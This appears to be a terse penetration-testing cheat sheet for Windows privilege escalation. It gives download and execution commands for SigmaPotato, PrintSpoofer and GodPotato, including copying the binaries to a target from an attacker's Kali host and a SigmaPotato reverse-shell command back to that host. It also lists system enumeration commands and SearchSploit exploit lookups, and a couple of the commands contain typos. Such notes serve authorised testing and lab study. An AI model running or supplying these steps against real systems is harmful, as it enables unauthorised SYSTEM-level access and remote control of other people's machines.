Exploits

SigmaPotato.exe

wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe

1

Download SigmaPotato.exe into target machine

iwr -Uri http://<Kali IP Address>/SigmaPotato.exe -OutFile SigmaPotato.exe

2

Execute command

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

EXAMPLE: Send reverse shell back

./SigmaPotato.exe --revshell <Kali IP Address> <Kali Port>

PrintSpoof.exe

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe

1

Download PrintSpoofer.exe

iwr -Uri http://<Kali IP Address>/PrintSpoofer[64 / 32].exe -OutFile PrintSpoofer[64 / 32].exe

2

Execute Command

PrintSpoofer.exe -i -c <Command To Execute>

GodPotato.exe

NOTE: Know the version by the following

reg query "HKLM\SOFTWARE\Microsoft\Net Framework Setup\NDP" /s

wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe

wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe

wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe

1

Download GodPotato.exe

iwr -Uri http://<Kali IP Address>/GodPotato-[Version].exe -OutFile GodPotato.exe

2

Execute command

./GodPotato.exe -cmd "<Command to execute>"

SearchSploit

1

Windows Enumeration

Identify OS name, version, architecture

systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"

wmic os get Caption, Version. OSArchitecture

NOTE: Get Windows Build Version from here.

2

Search exploit in SearchSploit

searchspoilt <Key Word>

EXAMPLE:

searchsploit "Windows Kernel Build <Build Number> Local Privilege Escalation"

3

Download exploit

searchsploit -m <EDB-ID>